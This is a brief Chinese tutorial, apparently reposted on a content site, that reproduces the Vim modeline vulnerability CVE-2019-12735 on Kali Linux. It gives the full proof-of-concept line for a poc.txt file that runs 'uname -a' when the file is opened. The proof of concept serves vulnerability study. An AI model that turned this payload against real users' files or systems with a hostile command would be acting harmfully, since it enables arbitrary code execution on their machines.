微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

CVE-2019-12735 VIM命令执行漏洞利用

操作系统:Kali Linux

VIM版本:VIM - Vi IMproved 8.1.693 (2018 May 18,compiled Jan 05 2019 20:53:12)

因为vim关闭modeline,所以首先要手工设置modeline。

第1步:开启modeline

用户家目录(如:/root/)下创建.vimrc文件文件内容为:

set modeline

分享图片

第2步:创建poc.txt

创建poc.txt,文件内容为:

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

第3步:打开poc.txt

使用vim打开poc.txt即可看到uname命令的执行结果。

分享图片

这个漏洞比较鸡肋的一点就是vim认不开启modeline,所以漏洞影响范围有一定局限性。

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐